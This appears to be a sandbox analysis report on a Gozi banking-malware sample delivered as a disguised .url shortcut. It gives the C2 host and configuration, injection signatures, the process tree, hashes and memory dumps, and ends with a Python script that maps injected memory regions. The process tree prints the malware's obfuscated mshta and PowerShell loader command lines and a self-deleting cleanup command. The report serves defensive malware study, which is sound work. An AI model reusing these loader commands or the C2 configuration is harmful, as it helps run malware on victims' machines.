Analysis

max time kernel: 156s
max time network: 166s
platform: windows10-1703_x64
resource: win10-20230915-en
resource tags: arch:x64, arch:x86, image:win10-20230915-en, locale:en-us, os:windows10-1703-x64, system
submitted: 13-10-2023 01:40
Tasks

Static task: static1

Behavioral tasks (task, sample, resource):
  behavioral1   url/Amministrazione.url   win10-20230915-en
  behavioral2   url/Amministrazione.url   win10v2004-20230915-en
  behavioral3   url/Azienda.url           win10-20230915-en
  behavioral4   url/Azienda.url           win10v2004-20230915-en
  behavioral5   url/Cliente.url           win10-20230915-en
  behavioral6   url/Cliente.url           win10v2004-20230915-en
  behavioral7   url/Documenti.url         win10-20230915-en
  behavioral8   url/Documenti.url         win10v2004-20230915-en
  behavioral9   url/Informazioni.url      win10-20230915-en
  behavioral10  url/Informazioni.url      win10v2004-20230915-en
  behavioral11  url/dettagli.url          win10-20230831-en
  behavioral12  url/dettagli.url          win10v2004-20230915-en
  behavioral13  url/inform.url            win10-20230915-en
  behavioral14  url/inform.url            win10v2004-20230915-en
  behavioral15  url/modulo.url            win10-20230915-en
  behavioral16  url/modulo.url            win10v2004-20230915-en
  behavioral17  url/processo.url          win10-20230915-en
  behavioral18  url/processo.url          win10v2004-20230915-en
  behavioral19  url/sistema.url           win10-20230915-en
General

Target: url/Cliente.url
Size: 194B
MD5: 0da2f6812c1bc76eaa25be1e6a2eaf4c
SHA1: e4b237e5f7bb7b96e9bfb43c126541fc892d3b0a
SHA256: 0042887574aae1f954f0459b9448c0fa4501bb8719843940315d466645da9a7b
SHA512: a5495580fae00444b4edbff6894e1e302025ddff295a26fe519bc229724d3961646afb1cece2be892b19840035152a937fa3f7910e4fe04adea751eb319d96cb
Malware Config

Extracted (1)
  Family: gozi
  Botnet: 5050
  C2: fotexion.com
  base_path: /jerry/
  build: 250260
  exe_type: loader
  extension: .bob
  server_id: 50

Extracted (2)
  Family: gozi
  Botnet: 5050
  C2: fotexion.com
  base_path: /pictures/
  build: 250260
  exe_type: worker
  extension: .bob
  server_id: 50

Both configs share the C2 host, botnet ID, build and server_id; they differ only in base_path and exe_type (loader vs worker), i.e. they are the two stages of the same build.
Signatures

Blocklisted process makes network request (1 IoC)
  flow 8: pid 4236 rundll32.exe

Loads dropped DLL (1 IoC)
  pid 4236 rundll32.exe

Suspicious use of SetThreadContext (6 IoCs)
  source pid / process   -> target pid / process
  4460 powershell.exe    -> 3296 Explorer.EXE
  3296 Explorer.EXE      -> 3840 RuntimeBroker.exe
  3296 Explorer.EXE      -> 4792 cmd.exe
  4792 cmd.exe           -> 4192 PING.EXE
  3296 Explorer.EXE      -> 1436 WinMail.exe
  3296 Explorer.EXE      -> 700 cmd.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
  Key created by rundll32.exe: \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid 4192 PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid 4236 rundll32.exe (2 hits), pid 4460 powershell.exe (3 hits), pid 3296 Explorer.EXE (remaining 59 hits)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid 3296 Explorer.EXE

Suspicious behavior: MapViewOfSection (6 IoCs)
  pid 4460 powershell.exe (1 hit), pid 3296 Explorer.EXE (4 hits), pid 4792 cmd.exe (1 hit)

Suspicious use of AdjustPrivilegeToken (15 IoCs)
  SeDebugPrivilege           4460 powershell.exe (1 hit)
  SeShutdownPrivilege        3296 Explorer.EXE (7 hits)
  SeCreatePagefilePrivilege  3296 Explorer.EXE (7 hits)

Suspicious use of FindShellTrayWindow (1 IoC)
  pid 1112 rundll32.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid 3296 Explorer.EXE

Suspicious use of WriteProcessMemory (46 IoCs)
  writer pid / process   -> target pid / process    hits
  1112 rundll32.exe      -> 4588 control.exe         2
  4588 control.exe       -> 4492 rundll32.exe        2
  4492 rundll32.exe      -> 4236 rundll32.exe        3
  2480 mshta.exe         -> 4460 powershell.exe      2
  4460 powershell.exe    -> 5012 csc.exe             2
  5012 csc.exe           -> 952 cvtres.exe           2
  4460 powershell.exe    -> 3484 csc.exe             2
  3484 csc.exe           -> 3772 cvtres.exe          2
  4460 powershell.exe    -> 3296 Explorer.EXE        4
  3296 Explorer.EXE      -> 3840 RuntimeBroker.exe   4
  3296 Explorer.EXE      -> 4792 cmd.exe             5
  4792 cmd.exe           -> 4192 PING.EXE            5
  3296 Explorer.EXE      -> 1436 WinMail.exe         5
  3296 Explorer.EXE      -> 700 cmd.exe              6

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

Indentation shows the parent/child relationship; PIDs in parentheses are taken from the signature tables above.

C:\Windows\Explorer.EXE  (pid 3296)
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\rundll32.exe  (pid 1112)
    command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Cliente.url
    - Modifies registry class
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\control.exe  (pid 4588)
      command line: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\rundll32.exe  (pid 4492)
        command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\rundll32.exe  (pid 4236)
          command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl",
          - Blocklisted process makes network request
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses

  C:\Windows\System32\mshta.exe  (pid 2480)
    command line: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>O8ie='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(O8ie).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C007E561-1FD8-F246-A9F4-C346ED68A7DA\\\GlobalPlay'));if(!window.flag)close()</script>"
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (pid 4460)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xmocyoxeca -value gp; new-alias -name uwdhgkyjvg -value iex; uwdhgkyjvg ([System.Text.Encoding]::ASCII.GetString((xmocyoxeca "HKCU:Software\AppDataLow\Software\Microsoft\C007E561-1FD8-F246-A9F4-C346ED68A7DA").VirtualActive))
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.cmdline"
        - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFEED.tmp" "c:\Users\Admin\AppData\Local\Temp\123q5kxh\CSCD8F288A0F8FC42ADA1EFBAAB9E33C6D.TMP"

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.cmdline"
        - Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF99.tmp" "c:\Users\Admin\AppData\Local\Temp\nhqex5fl\CSC869BF5DEA9C2407C9078EDC455DF949.TMP"

  C:\Windows\System32\cmd.exe  (pid 4792)
    command line: "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\PING.EXE  (pid 4192)
      command line: ping localhost -n 5
      - Runs ping.exe
      - Suspicious behavior: CmdExeWriteProcessMemorySpam

  C:\Program Files\Windows Mail\WinMail.exe  (pid 1436)
    command line: "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE

  C:\Windows\syswow64\cmd.exe  (pid 700)
    command line: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\RuntimeBroker.exe  (pid 3840)
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl
  Filesize: 206KB
  MD5: 72e2a5c797954e895a41be5b20f867b2
  SHA1: 419aacfb3ccea9b08277bcc9405054fa4238a597
  SHA256: 858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
  SHA512: 77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

C:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.dll
  Filesize: 3KB
  MD5: db160ce78cc8849b45f430deb0dd360d
  SHA1: 29c383343dfd9c2503730d23d1290db329e4db6f
  SHA256: d1ad2e0997219437a0fb45e0c8b017900796c98bd9dbe27fb9ba0dbf36f72b70
  SHA512: ba0aba26e7ced18ead1e12bf6928afa3f20548870687dad5a37cb81f667f04f9a94883fc4767e532878f2a60ac5f1e2b98383191fe7f41e0053877e1d0001376

C:\Users\Admin\AppData\Local\Temp\RESFEED.tmp
  Filesize: 1KB
  MD5: 583c116dd357c8c69518ddfe993d3a64
  SHA1: 0482e0559132492f83681ebe7e6654d42957882f
  SHA256: befcbd2ea572d67352bea5da07f32de7d3097bc011217a263c818dfd5782b187
  SHA512: 3142ad01bcde4bdee22c367241df94ff7248876d342eca783dd0cedae0ab728bd02994d30d64ac51cb240814a12d11c16f8ea625072113bc420a5551d536848f

C:\Users\Admin\AppData\Local\Temp\RESFF99.tmp
  Filesize: 1KB
  MD5: 8ce6684665928dddf230c12165e3efbc
  SHA1: e9eb46ffd29ab7614854c414ba268faddcc6aefc
  SHA256: 0c37d612355061ea234b9b6d9b56d386b75a449437402da66d8882bb02e42d5a
  SHA512: b1f68d30fad807dc2c3b46d9e710d23902f3862a5991ccb55f9b263ec06d40dc2b293480cf9ba6d3b9cb0d1e92c1b199b2134ff947080bddecdf7c34602b52a9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e43mj5bz.wbh.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.dll
  Filesize: 3KB
  MD5: ffc4692689dfe0b0bc47e197c0740016
  SHA1: 327db1dadfdda687629bc64db10de2988cdb8fff
  SHA256: ea658b845aa888818d511da4d4c2917ff1c5ef1c3c3cc2cb36a99eb7e53e1c1c
  SHA512: 29077450cb176d7b2bbbc61e552091c3fb4c9b7a94cd22fc0ddc524dc0e0eb61c1669316cc5da4153d55f9480d51cd31dd8a47d5d24731f02a2a427591b31bd3

\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.0.cs
  Filesize: 405B
  MD5: caed0b2e2cebaecd1db50994e0c15272
  SHA1: 5dfac9382598e0ad2e700de4f833de155c9c65fa
  SHA256: 21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
  SHA512: 86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\123q5kxh.cmdline
  Filesize: 369B
  MD5: bd06dc5b128da823d3627ca45590483f
  SHA1: 0eeca05b5d3015f70a1918916dda46d996940483
  SHA256: 5a4852c3ee746929c59ad71f75beb9938bc9d8cc2fb73e3f8929b7477a2e6c08
  SHA512: 81906054b13421fbee1e7dd06a1df07fe0da8820cc06c40300aa5745a9356036a3ac8d65208b3af4c8d7e450baee667b75097c2a197a083c83110c8c2f5b9a2c

\??\c:\Users\Admin\AppData\Local\Temp\123q5kxh\CSCD8F288A0F8FC42ADA1EFBAAB9E33C6D.TMP
  Filesize: 652B
  MD5: 01d748f1649d191d7071e06196b79300
  SHA1: 250d50fa519143d3e75b1e605c7f45c276cc1d89
  SHA256: 7693d16f1acfa7f35b877e99d313d84c9a5fa9a42721888c17367f993ff92eb5
  SHA512: 1fe0ad376ec3ad830b4a1f2ef4fb87f316c166fbda20f15a623c747f1b03656e3df7f9c40cb270674365d7250723b2d78307167f24c71d7c9e69c2c3dc687895

\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\CSC869BF5DEA9C2407C9078EDC455DF949.TMP
  Filesize: 652B
  MD5: a983f9fbfe68e9385733cee793f78d23
  SHA1: d7eda52ec169c6de71e44e698a3e4b4d3aeb226e
  SHA256: 5cfed296c0a288354ea200729bff96fafc847cc19483c4aee7c9d42e94f60757
  SHA512: 3ee38b59e53252dee5400924271ac5478cb209882018e56bb691621006639b5b7417d0aa1ba3d1e2cbfc909925dbc4a2c4b242b5631d0e57ee7d612be7be9b91

\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.0.cs
  Filesize: 406B
  MD5: ca8887eacd573690830f71efaf282712
  SHA1: 0acd4f49fc8cf6372950792402ec3aeb68569ef8
  SHA256: 568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
  SHA512: 2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

\??\c:\Users\Admin\AppData\Local\Temp\nhqex5fl\nhqex5fl.cmdline
  Filesize: 369B
  MD5: 7e78599de5869c89b3e678da82bcff6e
  SHA1: fd69b3c68b5f1606c08c106e989acfc236fa6202
  SHA256: eeae0a489d983887916adb2990856b15799c39c327a74fe446c44266071da600
  SHA512: 95032f3603be963eda9d3fa00b0f14d5c6102736daa4c07b1d91ef16ff2630df7aca1d075a8ae4d92ef2c2c45ee06213e5d1cdbb949f0cdc7bc4047041eebf1b

\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\sistema[1].cpl
  (same file as the first entry, recorded again as the DLL loaded by rundll32.exe)
  Filesize: 206KB
  MD5: 72e2a5c797954e895a41be5b20f867b2
  SHA1: 419aacfb3ccea9b08277bcc9405054fa4238a597
  SHA256: 858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
  SHA512: 77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
Memory dumps (name, size)

memory/700-141-0x0000000003300000-0x0000000003398000-memory.dmp     608KB
memory/700-134-0x0000000003300000-0x0000000003398000-memory.dmp     608KB
memory/700-137-0x0000000000E40000-0x0000000000E41000-memory.dmp     4KB
memory/1436-129-0x0000023B21F40000-0x0000023B21FE4000-memory.dmp    656KB
memory/1436-120-0x0000023B21F40000-0x0000023B21FE4000-memory.dmp    656KB
memory/1436-121-0x0000023B21F10000-0x0000023B21F11000-memory.dmp    4KB
memory/3296-135-0x0000000002F60000-0x0000000003004000-memory.dmp    656KB
memory/3296-76-0x0000000002F60000-0x0000000003004000-memory.dmp     656KB
memory/3296-77-0x0000000001090000-0x0000000001091000-memory.dmp     4KB
memory/3840-142-0x000001D82C590000-0x000001D82C634000-memory.dmp    656KB
memory/3840-93-0x000001D82C590000-0x000001D82C634000-memory.dmp     656KB
memory/3840-94-0x000001D82A060000-0x000001D82A061000-memory.dmp     4KB
memory/4192-145-0x000001E1CB190000-0x000001E1CB234000-memory.dmp    656KB
memory/4192-115-0x000001E1CAEF0000-0x000001E1CAEF1000-memory.dmp    4KB
memory/4192-114-0x000001E1CB190000-0x000001E1CB234000-memory.dmp    656KB
memory/4236-6-0x00000000048A0000-0x00000000048C9000-memory.dmp      164KB
memory/4236-7-0x00000000048E0000-0x00000000048EE000-memory.dmp      56KB
memory/4236-8-0x0000000004D50000-0x0000000004D5D000-memory.dmp      52KB
memory/4236-11-0x00000000048E0000-0x00000000048EE000-memory.dmp     56KB
memory/4236-112-0x00000000048E0000-0x00000000048EE000-memory.dmp    56KB
memory/4460-70-0x0000023275130000-0x0000023275138000-memory.dmp     32KB
memory/4460-56-0x000002325CCE0000-0x000002325CCE8000-memory.dmp     32KB
memory/4460-19-0x00000232750B0000-0x00000232750D2000-memory.dmp     136KB
memory/4460-91-0x0000023275140000-0x000002327517D000-memory.dmp     244KB
memory/4460-90-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmp     9.9MB
memory/4460-74-0x0000023275140000-0x000002327517D000-memory.dmp     244KB
memory/4460-72-0x00000232751A0000-0x00000232751B0000-memory.dmp     64KB
memory/4460-21-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmp     9.9MB
memory/4460-25-0x00000232753B0000-0x0000023275426000-memory.dmp     472KB
memory/4460-24-0x00000232751A0000-0x00000232751B0000-memory.dmp     64KB
memory/4460-23-0x00000232751A0000-0x00000232751B0000-memory.dmp     64KB
memory/4792-105-0x000001C7A5560000-0x000001C7A5604000-memory.dmp    656KB
memory/4792-144-0x000001C7A5560000-0x000001C7A5604000-memory.dmp    656KB
memory/4792-106-0x000001C7A52A0000-0x000001C7A52A1000-memory.dmp    4KB

Every process that powershell.exe or Explorer.EXE set a thread context on (3296, 3840, 4792, 4192, 1436) carries a 656KB region at a process-specific address, plus one 4KB page; pid 700 instead carries a 608KB region, and the original rundll32.exe (4236) and powershell.exe (4460) hold only their own loader stages.
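A quick way to turn the dump list and the SetThreadContext table into an injection map is to compute each region's size from its start and end addresses and look for sizes that recur across unrelated processes. The following is an added example, not code from the sandbox report: DUMPS holds the dump names from this page (one per distinct region; repeated snapshots of the same range are omitted) and THREAD_CONTEXT_EDGES the (source pid, target pid) pairs from the Signatures section; the function names are mine.

```python
"""Correlate memory-dump regions with SetThreadContext injection targets.

Added example, not part of the sandbox report. DUMPS and THREAD_CONTEXT_EDGES
are transcribed from this page; the helper names are the author's of this
example, not the sandbox's.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Dump names have the shape memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
DUMP_RE = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp")

DUMPS = """
memory/700-141-0x0000000003300000-0x0000000003398000-memory.dmp
memory/700-137-0x0000000000E40000-0x0000000000E41000-memory.dmp
memory/1436-129-0x0000023B21F40000-0x0000023B21FE4000-memory.dmp
memory/1436-121-0x0000023B21F10000-0x0000023B21F11000-memory.dmp
memory/3296-76-0x0000000002F60000-0x0000000003004000-memory.dmp
memory/3296-77-0x0000000001090000-0x0000000001091000-memory.dmp
memory/3840-93-0x000001D82C590000-0x000001D82C634000-memory.dmp
memory/3840-94-0x000001D82A060000-0x000001D82A061000-memory.dmp
memory/4192-114-0x000001E1CB190000-0x000001E1CB234000-memory.dmp
memory/4192-115-0x000001E1CAEF0000-0x000001E1CAEF1000-memory.dmp
memory/4236-6-0x00000000048A0000-0x00000000048C9000-memory.dmp
memory/4236-7-0x00000000048E0000-0x00000000048EE000-memory.dmp
memory/4236-8-0x0000000004D50000-0x0000000004D5D000-memory.dmp
memory/4460-70-0x0000023275130000-0x0000023275138000-memory.dmp
memory/4460-56-0x000002325CCE0000-0x000002325CCE8000-memory.dmp
memory/4460-19-0x00000232750B0000-0x00000232750D2000-memory.dmp
memory/4460-91-0x0000023275140000-0x000002327517D000-memory.dmp
memory/4460-90-0x00007FFC7FBF0000-0x00007FFC805DC000-memory.dmp
memory/4460-72-0x00000232751A0000-0x00000232751B0000-memory.dmp
memory/4460-25-0x00000232753B0000-0x0000023275426000-memory.dmp
memory/4792-105-0x000001C7A5560000-0x000001C7A5604000-memory.dmp
memory/4792-106-0x000001C7A52A0000-0x000001C7A52A1000-memory.dmp
""".split()

# (writer pid, target pid) from "Suspicious use of SetThreadContext"
THREAD_CONTEXT_EDGES = [(4460, 3296), (3296, 3840), (3296, 4792),
                        (4792, 4192), (3296, 1436), (3296, 700)]


def parse_dump(name: str) -> Dict[str, int]:
    """Split a dump name into pid, sequence number, start address and byte size."""
    m = DUMP_RE.fullmatch(name)
    if m is None:
        raise ValueError(f"not a memory dump name: {name}")
    pid, seq, start, end = int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)
    return {"pid": pid, "seq": seq, "start": start, "size": end - start}


def region_sizes_by_pid(names: List[str]) -> Dict[int, Set[int]]:
    """pid -> set of distinct region sizes dumped from that process."""
    out: Dict[int, Set[int]] = defaultdict(set)
    for n in names:
        d = parse_dump(n)
        out[d["pid"]].add(d["size"])
    return dict(out)


def shared_regions(names: List[str], min_pids: int = 3,
                   min_size: int = 0x10000) -> Dict[int, List[int]]:
    """Region sizes (>= min_size) that recur in at least min_pids distinct processes.

    Same-size regions at different addresses in unrelated processes are the usual
    fingerprint of one payload injected into each of them; single-page regions are
    skipped because almost every process carries such a stub.
    """
    by_size: Dict[int, Set[int]] = defaultdict(set)
    for n in names:
        d = parse_dump(n)
        if d["size"] >= min_size:
            by_size[d["size"]].add(d["pid"])
    return {s: sorted(p) for s, p in by_size.items() if len(p) >= min_pids}


def injected_pids(edges: List[Tuple[int, int]]) -> List[int]:
    """Every process that had a thread context set by another process."""
    return sorted({target for _, target in edges})


def injection_coverage(names: List[str],
                       edges: List[Tuple[int, int]]) -> Dict[int, bool]:
    """For each SetThreadContext target, whether a shared-size region was dumped from it.

    False means the process had a thread hijacked but holds a region of a different
    size (or none), so its dump needs a separate look rather than being assumed to
    be another copy of the same payload.
    """
    shared = {p for pids in shared_regions(names).values() for p in pids}
    return {t: t in shared for t in injected_pids(edges)}


if __name__ == "__main__":
    for size, pids in shared_regions(DUMPS).items():
        print(f"{size:#x} bytes ({size // 1024}KB) in pids {pids}")
    print("injection coverage:", injection_coverage(DUMPS, THREAD_CONTEXT_EDGES))
```

On this page's data the only recurring size above one page is 0xA4000 (656KB), present in five of the six SetThreadContext targets; pid 700 (the second cmd.exe) comes back False because its 608KB region matches nothing else, which is the dump to open first if the goal is to find out whether it holds a different stage or a partially written copy.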